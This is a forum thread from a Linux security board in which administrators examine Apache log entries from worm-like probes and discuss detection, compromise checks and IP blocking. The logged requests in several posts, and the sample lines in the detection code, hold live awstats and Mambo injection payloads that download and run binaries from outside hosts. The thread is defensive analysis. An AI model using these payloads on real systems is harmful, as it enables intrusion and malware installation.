LinuxQuestions.org
Linux - Security This forum is for all security related questions.
Old 12-16-2005, 08:48 AM   #1
tebucky
Member
 
Registered: Mar 2004
Posts: 89

Rep: Reputation: 15
Entries in access logs


Does anyone have any knowledge that they can share regarding these apache access log entries? I am concerned that I may have been breached.


62.193.237.51 - - [15/Dec/2005:11:06:12 -0500] "GET http://70.84.135.3/~antigoth/printenv.php HTTP/1.1" 404 297 "-" "Mozilla/5.0"
66.182.53.50 - - [16/Dec/2005:04:30:36 -0500] "HEAD / HTTP/1.0" 200 - "-" "-"
131.234.140.140 - - [16/Dec/2005:08:07:35 -0500] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20128%2e173%2e40%2e113%2flisten%3bchmod%20% 2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1"
131.234.140.140 - - [16/Dec/2005:08:07:36 -0500] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20128%2e173%2e40%2e113%2flisten%3bchmod%20% 2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1"
131.234.140.140 - - [16/Dec/2005:08:07:37 -0500] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20128%2e173%2e40%2e113%2flisten%3bchmod%20% 2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 301 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1"
131.234.140.140 - - [16/Dec/2005:08:07:38 -0500] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20128.173.40.113/listen;chmod%20744%20listen;./listen;echo%20YYY;echo| HTTP/1.1" 404 285 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1"
131.234.140.140 - - [16/Dec/2005:08:07:39 -0500] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20128.173.40.113/listen;chmod%20744%20listen;./listen;echo%20YYY;echo| HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1"
131.234.140.140 - - [16/Dec/2005:08:07:43 -0500] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20128.173.40.113/listen;chmod%20744%20listen;./listen;echo%20YYY;echo| HTTP/1.1" 404 291 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1"
131.234.140.140 - - [16/Dec/2005:08:07:44 -0500] "GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20128.173.40.113/listen;chmod%20744%20listen;./listen;echo%20YYY;echo| HTTP/1.1" 404 295 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1"
 
Old 12-16-2005, 09:41 AM   #2
RaelOM
Member
 
Registered: Dec 2004
Posts: 110

Rep: Reputation: 16
What entry in that log concerns you?

It looks fine to me.
 
Old 12-16-2005, 09:56 AM   #3
Matir
LQ Guru
 
Registered: Nov 2004
Location: San Jose, CA
Distribution: Debian, Arch
Posts: 8,507

Rep: Reputation: 128
I agree with tebucky, they do look suspicious. They look like an effort to upload some program "listen" to your /tmp directory and then execute it. I would presume the listen program probably gives them a shell on your system. Use netstat, ps, and look in /tmp to see if you see signs of anything. Also, try running chkrootkit and rkhunter. From the section of log you posted, you should be fine, as all requests returned a 404, so it would seem that your system is devoid of the vulnerable scripts. The server from which listen was being downloaded is no longer online (which surprises me, given the timestamps on your logs). The IP accessing your system belongs to the University of Paderborn in Germany, but my guess would be that it is just a compromised system that has been taken over. I do encourage you, however, to contact them if you want more information from them or just to let them know about this.
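The triage Matir describes (spot the fetch-and-run request, then check whether the server answered 404 or actually served it) can be scripted. This is an added example, not code from the thread; the log lines in it are constructed after the ones posted above, with documentation-range IPs standing in for the download hosts.

```python
import re
from urllib.parse import unquote

# Apache combined log: client, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Patterns taken from the requests in this thread: a pipe into the awstats
# configdir parameter, the Mambo remote include, and the wget/chmod/run chain.
SUSPICIOUS = [
    ("awstats configdir pipe", re.compile(r"awstats\.pl\?configdir=\|", re.I)),
    ("mambo remote include", re.compile(r"mosConfig_absolute_path=https?://", re.I)),
    ("download-and-execute chain", re.compile(r"wget\s+\S+.*chmod\s+\S+.*;\s*\./", re.I)),
]

def classify(line):
    """Return (ip, status, labels) for a suspicious request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    req = unquote(m.group("req"))  # decode %20, %2e, %3b ... before matching
    labels = [name for name, rx in SUSPICIOUS if rx.search(req)]
    if not labels:
        return None
    return m.group("ip"), int(m.group("status")), labels

def triage(lines):
    """Split hits into 'served' (status < 400: the script existed, investigate
    the host) and 'rejected' (4xx/5xx: the probe found nothing)."""
    served, rejected = [], []
    for line in lines:
        hit = classify(line)
        if hit is not None:
            (served if hit[1] < 400 else rejected).append(hit)
    return served, rejected

# Constructed sample lines modelled on the thread (not real traffic).
SAMPLE = [
    '131.234.140.140 - - [16/Dec/2005:08:07:35 -0500] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20198%2e51%2e100%2e7%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten;echo%20YYY;echo| HTTP/1.1" 404 293 "-" "Mozilla/4.0"',
    '24.70.88.18 - - [16/Dec/2005:19:23:50 -0600] "GET /index.php?option=com_content&mosConfig_absolute_path=http://203.0.113.5/cmd.gif?&cmd=cd%20/tmp;wget%20203.0.113.9/listen;chmod%20744%20listen;./listen;echo| HTTP/1.1" 200 683 "-" "Mozilla/4.0"',
    '66.182.53.50 - - [16/Dec/2005:04:30:36 -0500] "HEAD / HTTP/1.0" 200 - "-" "-"',
]

if __name__ == "__main__":
    served, rejected = triage(SAMPLE)
    for ip, status, labels in served:
        print(f"INVESTIGATE {ip} status={status} {labels}")
    for ip, status, labels in rejected:
        print(f"probe only  {ip} status={status} {labels}")
```

Feed it a real access_log with `triage(open("access_log"))`; anything in the served list is the case lawadm1 describes below and warrants the netstat/ps/chkrootkit checks rather than reassurance.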
 
Old 12-16-2005, 12:50 PM   #4
unSpawn
Moderator
 
Registered: May 2001
Posts: 29,415
Blog Entries: 55

Rep: Reputation: 3608
First guess would be a Lupper worm thing or someone exploiting a vulnerable installation of Awstats.
List all connections and then shut down all publicly accessible daemons except your ssh for mgmt purposes. Next I would forcefully log off all users, set a new root password and use your firewall to drop all traffic except from your ssh range/IP address before you investigate any further. BTW, if it's a uni IP they're from, it's either a compromised springboard or a proxy. Don't bother with that except firing off a warning they should check that system.
 
Old 12-17-2005, 04:05 PM   #5
lawadm1
Member
 
Registered: Jul 2003
Location: Illinois
Distribution: Fedora 11, Ubuntu 9.04
Posts: 80

Rep: Reputation: 15
I had some similar logs in my access_log, only I did see a status 200.
Can anyone tell me what I should look at if indeed I've been compromised?

24.70.88.18 - - [16/Dec/2005:19:23:50 -0600] "GET/index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=
com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=
cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo| HTTP/1.1" 200 683
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1"
 
Old 12-19-2005, 10:53 AM   #6
tebucky
Member
 
Registered: Mar 2004
Posts: 89

Original Poster
Rep: Reputation: 15
What is the best way to block entire country IPs (say all "KR" IP addresses)? I would get the raw list from http://ip.ludost.net/. I was going to use the deny portion of apache's httpd.conf file but that will make the file very messy. If I installed firestarter as my firewall could I implement hundreds of IPs?

My "paranoia" stems from these entries in my access_logs. Although I believe that because I am returning a "404" I am ok, I would like to prevent this traffic altogether. Here are some examples:

199.44.194.57 - - [19/Dec/2005:09:51:59 -0500] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2065%2e218%2e1%2e216%2fnikons%3bchmod%20%2b x%20nikons%3b%2e%2fnikons;echo%20YYY;echo| HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1"
199.44.194.57 - - [19/Dec/2005:09:52:00 -0500] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2065%2e218%2e1%2e216%2fnikons%3bchmod%20%2b x%20nikons%3b%2e%2fnikons;echo%20YYY;echo| HTTP/1.1" 404 301 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1"

and

199.44.194.57 - - [19/Dec/2005:09:52:08 -0500] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 295 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1"
199.44.194.57 - - [19/Dec/2005:09:52:09 -0500] "POST /xmlrpc.php HTTP/1.1" 404 285 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1"
199.44.194.57 - - [19/Dec/2005:09:52:10 -0500] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 292 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1"
199.44.194.57 - - [19/Dec/2005:09:52:11 -0500] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 292 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1

TIA!
 
Old 12-19-2005, 11:26 AM   #7
Matir
LQ Guru
 
Registered: Nov 2004
Location: San Jose, CA
Distribution: Debian, Arch
Posts: 8,507

Rep: Reputation: 128
Blocking a LARGE number of IPs (i.e., the range in that list) will cause a significant slowdown in your traffic unless your system is currently VERY lightly loaded. Every item in that list will generate a comparison on EVERY packet received. This will be unhelpful. You could make it a little better by only checking SYN packets to the HTTP port, but then it would still slow down initial connections. Not to mention that it would block any legitimate users off those IP ranges. I would advise against that, but if it is necessary, iptables would be far more efficient than apache's deny.
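The shape Matir sketches (a separate chain, consulted only for new TCP connections to the HTTP port, with the list collapsed to as few rules as possible) can be generated from a CIDR list like this. This is an added example, not from the thread or from ip.ludost.net; the list below is constructed from documentation ranges, the chain name GEOBLOCK is arbitrary, and the function only emits commands for review, it does not run them.

```python
import ipaddress

def load_networks(text):
    """Parse one CIDR or bare IP per line (blank lines and '#' comments
    skipped) and collapse overlapping/adjacent networks, so the resulting
    rule chain is as short as the list allows."""
    nets = []
    for raw in text.splitlines():
        entry = raw.split("#", 1)[0].strip()
        if entry:
            nets.append(ipaddress.ip_network(entry, strict=False))
    return list(ipaddress.collapse_addresses(nets))

def iptables_rules(nets, port=80, chain="GEOBLOCK"):
    """Emit iptables commands: create a dedicated chain and jump to it only
    for SYN packets to `port`, so established traffic never walks the list."""
    rules = [
        f"iptables -N {chain}",
        f"iptables -I INPUT -p tcp --dport {port} --syn -j {chain}",
    ]
    rules += [f"iptables -A {chain} -s {net.with_prefixlen} -j DROP" for net in nets]
    rules.append(f"iptables -A {chain} -j RETURN")  # not listed: fall through
    return rules

# Constructed sample list (documentation ranges, not a real country allocation).
SAMPLE_LIST = """\
192.0.2.0/25
192.0.2.128/25   # adjacent to the block above: collapses into 192.0.2.0/24
198.51.100.0/24
198.51.100.77    # already inside 198.51.100.0/24: removed by the collapse
203.0.113.0/24
"""

if __name__ == "__main__":
    for rule in iptables_rules(load_networks(SAMPLE_LIST)):
        print(rule)
```

Review the generated commands before applying them, and keep your own management address out of the list as unSpawn's advice above implies.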
 
Old 12-19-2005, 12:28 PM   #8
tebucky
Member
 
Registered: Mar 2004
Posts: 89

Original Poster
Rep: Reputation: 15
Thanks Matir,

What would a sample IPtable entry look like?
 